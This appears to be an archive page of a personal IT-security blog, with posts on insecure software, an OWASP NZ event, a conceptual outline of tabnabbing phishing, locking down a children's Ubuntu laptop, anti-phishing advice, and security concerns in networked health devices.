Software Defects – The Broken Windows of Cyberspace

We are gearing up for a major push of strategic security work and as part of the backgrounding for one of the areas I will be working on, I spent an hour of my day listening to a 2009 presentation by David Rice, author of “Geekonomics – The Real Cost of Insecure Software”. which I have embedded below. It’s on the long side at around 1 hour, but certainly worth reviewing. If you can spare an eyeball, take the time to watch the presentation as Davids style is engaging and about as far from “Death by Powerpoint” as you can get.

Geekonomics: The Real Cost of Insecure Software from David Rice on Vimeo.

In typical spooky timing, a reminder about the OWASP NZ Day on July the 7th arrived in my inbox right in the middle of me watching the presentation video.

For those with an interest in security, but yet to attend an OWASP event, it’s certainly something I’d recommend (register here)- not only for the opportunity to chat to others in the industry, but for the great line up of speakers. This year, the event will again be held in Auckland and boasts the following topics:

  • Secure Development: What The OWASP Guide Didn’t Tell You – Blair Strang, Security-Assessment.com
  • I <3 Reporting – Managing Effective Web Application Assessments – Andrew Evans, Kiwibank
  • Testing Mobile Applications – Nick von Dadelszen, Lateral Security
  • Web Crypto for the Developer Who Has Better Things to Do – Adrian Hayes, Security-Assessment.com
  • Concurrency Vulnerabilities – Brett Moore, Insomnia Security
  • A Day in the Life of a WAF – Sam Pickles, F5
  • HTML5 Security – Mike Haworth & Kirk Jackson, Aura Information
  • Security File Uploads are Evil – Kirk Jackson, Aura Information
  • Security Sleeping Easy: Architecting Web Applications Securely – Mark Young, Datacom
  • Real Applications, Real Vulnerabilities, Really Exploited – Quintin Russ, SiteHost

For the developers, there are two 3 hour training courses also being held in parallel to the conference, but with seating limited to 20 participants per session, I’d suggest registering quickly to reserve your spot. More information can be found here.

Tabnabbing – An Even More Evil Phishing Attack

Image by Flickr user 'Toasty' http://www.flickr.com/photos/toasty/1276202472/Wow – I’ve just finished reading a recent blog post by Aza Raskin (creative lead for Firefox) and he presents an interesting new phishing attack vector for us to be(a)ware of, that of ‘Tabnabbing’.

For many of us, phishing attempts, (that is – attempts by ‘evil’ sites or emails to pretend they are from legitimate sources and then dupe the user into revealing login credentials or other useful information) are fairly easy to spot. Some are stupidly obvious such as the now well known tale of the government official who needs to get large sums of money out of the country, others are less blatant and use shortened URL services or minor misspellings to trick people into clicking their links. But now, joining the ever growing list of ways to socially engineer an inattentive user into revealing useful information, is some very clever javascript which seeks to fool us when we’re not looking!

The attack is structured as follows:

  1. The attacker gets a user to browse to a staging site
  2. When the user switches focus to another tab, the staging site then changes the favicon, and the content displayed on the page to something which the user will be familiar with – in his example, Aza uses a Gmail login or ‘credentials expired’ page.
  3. When the user next scans their open tabs, they recognise the familiar tab and switch to it – believing it to be the genuine article.
  4. Because it’s an existing open tab, they implicitly trust that the domain is what it should be – and from there the credentials are captured – and the user is redirected back to the legitimate site, oblivious that they’ve been scammed.

Continue reading “Tabnabbing – An Even More Evil Phishing Attack”

A PC for the Kids: Introduction

With my wife adopting a new notebook we’ve found ourselves with an additional, usable machine which we’ve earmarked for our boys use.

The unit in question is a rather dated IBM Thinkpad R51 which ran fine with Windows XP, but given that our boys are now of an age where they are being more inquisitive, I’ve decided that something a little more robust would better fit the bill than the aging Windows OS.

As a keen open source OS user myself, I’m planning to drop Ubuntu 10.04 LTS (Lucid Lynx) onto the notebook and then lock down the configuration to allow the boys to experiment, but not break the environment.

So, looking at the task list ahead of me, I’ll be looking to run through the following:

  1. Install the OS (release date is 29/04/2010)
  2. Install and configure parental control on the boys user accounts
  3. Lock down the rest of the system on the boys accounts
  4. Let the boys at the notebook and observe what usability issues crop up
  5. Tweak

The next few articles getting posted to the blog will be following through this list so I’ll be making extensive use of search engines, forums and any other resources I can leverage to get the best info to make this happen as painlessly as possible. Suggestions in the comments please 🙂



“If something seems too good to be true…

…it probably is.”

It’s an old, well-worn saying for sure, but it holds as true today as it did way back whenever the anonymous, cynical, amateur philosopher came up with it.

Recently in New Zealand, there have been an increase in phishing attempts trying to get people to open email attachments which then deploy malware onto the computer, and recruit your PC into a global network of compromised machines.

A few weeks ago, there were a number of emails arriving to various mailboxes I hold claiming to be from DHL or UPS and containing details of a package delivery, over the last few days, this threat has evolved to include messages purporting to be from Amazon and including details of a paid order.

The short version of this post is simply:

Don’t open attachments from people you do not know”

…but we can also extend this advice to “Treat any attachments or links from people you think you may know with a healthy dose of caution”.

For those who are interested in a little more information

The biggest risk around phishing attacks is they take advantage of our human nature of curiosity, implied trust of people (especially those we believe we know) and, dare we say it – greed. These “social hacks” are useful in that it’s relatively simple to change the appearance of an email so it looks like it comes from a friend or colleague, or to obscure a link to make it appear that is comes from your bank, or favourite social networking site.

It’s human nature…

The very nature of how we as humans operate is once we recognise a name we believe we can trust, we instinctively lower our defenses to being scammed and are often convinced to click that link, or open that email attachment.

The best defense against such attempts is a healthy dose of skepticism, look closely at the link, does it look long and complicated, does it redirect through a web domain that you don’t recognise?

Scan your email attachments – and, if you are in any doubt, contact your friend/colleague to check on the attachments validity. Or, visit the website directly rather than clicking on the link within the message – if it is your bank contacting you, you’ll still be able to access the information directly from the bank website, if it is a message from Facebook – you’ll also be able to get those updates direct from the site.

Protection at Home

In terms of viruses and malware, we don’t have anything near the same level of protection that we may enjoy on a corporate network. It’s up to us, whether we’re at work or home, to make the right decisions when dealing with any communications which may expose us, our machines, our data to risk. Email, Instant Messenger links, Social Network links/messages/applications, the list goes on – they’re all targets

The best advice I can offer is:

  • Keep your operating system and applications updated with the latest patches as they are released
  • Invest in a good anti-virus/anti-malware program, keep it updated daily – and use it to perform regular full scans on your systems, as well as checking out those suspicious files
  • Access websites from your browser rather than via emailed links
  • Perform regular backups of your important files (don’t forget your digital photos & video)
  • If you think you may have been compromised, scan your systems, change your passwords and seek help.

Above all, employ a healthy dose of skepticism when dealing with communications that you are not expecting, even when you believe you know the sender – and be careful out there…

spyPhone or iPhone?

BlackHatI’ve just finished reading this interesting article on an iPhone vulnerability which (could) propagate via SMS messaging and is due to be revealed at Black Hat in Las Vegas on Thursday (US time).

While currently unpatched, I imagine it’s got the attention of the team at Apple (though they haven’t responded – yet) so, in the meantime – be careful what you should you receive a txt message with a small square as the contents, the vulnerability allows the attacker to take control of many of the devices functions – including the microphone and camera. 😯

Can Security Policy live in a Business World?

I’ve had a couple of decent articles come through my various feeds this morning in regards to IT Security and how companies are gaining traction for the acceptance and adoption of policies.

Image by Flickr user ianlloyd
Image by Flickr user ianlloyd

I’ve had a couple of decent articles come through my various feeds this morning in regards to IT Security and how companies are gaining traction for the acceptance and adoption of policies.

Another point of interest raised by Forrester is the shift in spending toward security, but rather than defensive spending, the money is tending toward protecting the DATA. In an age where the security perimeter has shrunk from the outside of the business, to the connected systems, to any accessing device and right down to cheap, plentiful and high capacity USB storage devices, a perimeter approach seems unnecessarily costly to say the least (of course, this must be tempered with assurance of systems availability).Where this falls down however is in the belief structure of an organisation. Don O’Neill states :

“Cost is a function of perceived value.”

Thus, if you are unable to convince your financial stakeholders to invest in security, you are unlikely to be able to implement worthwhile preventative measures. On the flip side of this argument, it your company is entrenched in a border protectionism mindset, then a shift to focus on data protection (whilst maintaining systems availability via reduced defensive spending), again – you’re unlikely to succeed in implementing worthwhile preventative measures.

Image by Flickr user thenickster
Image by Flickr user thenickster

However, all is not lost – the other article discusses how we can use Social Psychology (PDF 213KB) to help encourage colleagues and influencers to adopt policies that we’d like to implement. For the most part, this is done via encouraging prosocial behaviors – that is, getting people to adopt the behaviors that they believe others are following. For instance, if I were to wish to encourage a Corporate to focus on data protection I would cite other companies such as Microsoft who are reducing their corporate firewalls on the perimeter, and doing more to authenticate users prior to allowing data to be used (i.e. check I’m an employee before you let me open, read, edit, print, email this document).



The Network World article goes on to suggest some measures to encourage adoption:

  • Post statistical information about the rate of compliance with various security measures where people can see the information…
  • Use comparison statistics about compliance rates to encourage healthy competition among work groups…
  • Provide individual information to each user in a periodic report…
  • Have rotating messages appear about different applications…

The article ends with a call to action – so be sure to actually click through

I’m sure that readers will have lots of ideas for how to apply Cialdini’s research findings. I suggest that everyone pitch in using the comment feature of this column to share these ideas…After all, 82% of all readers are cooperating with….

With all of the above in mind then – what can we do as Security Professionals to help protect our people from themselves and the big bad and nasty outside world? Well, like many others, my current soapbox is to get people to secure their files and encrypt their hard drives – do you have an area you’re focusing on? Discuss…

Portable Hacking Device for Soldiers

Now *this* is why it’d be fun to work in/with the Military in an innovation (non-lethal) capacity… loads of funding, loads of scope… okay, perhaps not here in New Zealand, but for economies such as the US, the defense contractors must get to play with some awesome toys, years ahead of the technology hitting the general populous…

Portable Hacking Device

Tanking Twimailer (and Trying Topify)

Dump TruckYesterday Alain E. posted the following comment on my Twimailer article

It is like Topify.com before less interesting. And in addition their twitter account is not even working. I personnally tried both and prefer Topify (first because their have a much nicer site) because their emails are better and allow follow back right from the message. In addition, I had too many down time with twimailer…

To be honest, I’ve not had any issues with the [Twimailer] service to date, but this comment sparked my interest – which peaked when I read this article on Read Write Web. It appears that Twimailer has been sold (for a somewhat paltry sum) to an unknown, who is in turn trying to flick off the service to another buyer less than a week after acquiring it.

As a result of this article, I have gone into my Twitter settings, changed my email back to the one used prior to the Twimailer service AND changed my password. I’d suggest that others do the same.

It may seem a little reactionary, but as I use my identity not only for my private tweets but also in support of my work, the potential threat of hijack is too high a price to pay for continued support for a service which has failed to inform its network of some pretty key changes in it’s organisation. Sorry Twimailer, it’s over between us, I’m moving on – and trying Topify

So my thanks once again to Alain for peaking my interest, and to the guys at RWW for keeping across these technologies – these are the reasons that you get my subscriptions to your Twitter and RSS feeds.

Photo Credit: USFarmer / Redman

Security Companies on Twitter

twittercathakzSince moving from the R&D field into the amorphous world of IT security, I’ve been trawling the web to find good resources to add to my list of feeds and help me learn more about what we do as a collective, and how those stories are sold to the non-security folk.

It was with some interest that I clicked the  link IT security vendors worth following on Twitter when today’s Network World security email arrived in my inbox. The article itself makes for some interesting reading, as does the Ãœber list of IT and Network companies using Twitter.

For myself, I’m currently struggling with the streams I already follow and, while applications such as TweetDeck allow me to create groups of twitterers, the sheer volume of tweets I deal with day to day has convinced me to cherry pick some of the selected “best of” tweeters for inclusion on my watchlist. They are as follows:

And of course, you can always follow me on Twitter as @NZRob

Health Monitoring 2.0?

Sensewear DeviceSorry about the headline, the 2.0 tag is getting waaay too much air time of late – that aside, I was reading an interesting article on some of the technology advances in the realms of health monitoring.

A few years ago I was researching some of the advances within medical monitoring and how the devices could be integrated into a connected home*. At that time we were looking at near field communication devices which would upload via Zigbee or a similar low range, low power technology, as well as a concept toilet in Japan which measures and reports on glucose levels detected in ones urine.
Anyway, with the advent of specifically addressable devices thanks to IPV6, as well as advances in near-field and Personal Area Networking (PAN), the reality may well be closer than we thought.

The self-care market is hotting up, especially in this difficult time where concern about the economy and ones future financial well-being may well be impacting on peoples immediate, and long term health.

Some of the more interesting companies making headway in enabling health monitoring are:

  • Proteus Biomedical who have just released their platform for body monitoring dubbed ‘Rasin’

Proteus ingestible event markers (IEMs) are tiny, digestible sensors…Once activated, the IEM sends an ultra low-power, private, digital signal through the body to a microelectronic receiver that is either a small bandage style skin patch or a tiny device insert under the skin. The receiver date- and time-stamps, decodes, and records information such as the type of drug, the dose, and the place of manufacture, as well as measures and reports physiologic measures such as heart rate, activity, and respiratory rate.

All of the data collected by the Proteus system can be sent wirelessly to the doctor for remote monitoring.  The system is currently in clinical development.

  • Body Media have their Sensewear device which allows “monitoring of calories burned, dietary intake, duration of physical activity and sleep”. It’s USB connected, which is fine, but I’d prefer to see a device that automated the processes for more ‘real-time’ monitoring and feedback possibilities – all in time I guess and the biggest issue will be size and battery life, just like every other mobile device.
  • The Toumaz device recognises the ‘you must remember to upload your data’ issue, and has created their ‘Sensium’ device with the capability to stream the data to a logging device (within ~5m). This is the kind of thing I’d be looking for, but would want to incorporate into a meshed network within the bounds of a home (or health-club) to make truly useful.

Of course, with my day-job hat on as a Security type person, the biggest concern, given the very personal nature of this data, is how security will be treated. Recent reports attribute [a potential link to] cyber terrorism, with the ability to cause widespread blackouts. Whether that threat is credible or a causative action with the cited 2003 US blackouts is debatable. What isn’t up for debate however is the fact that as more systems which control or influence our lives become network aware, the more this risk profile will inflate. How we deal with this is something which needs to be built into the monitoring protocols from the outset – especially with the potential to link into the online health record repositories being toyed with by big players Google and Microsoft.

Comments?… Fear? Uncertainty? Doubt?

*A ‘connected home’ is what marketers refer to as a ‘future home’ – a term which I really hate as I agree with William Gibson “…the future is already here. It’s just not very evenly distributed…” (time code 11:55).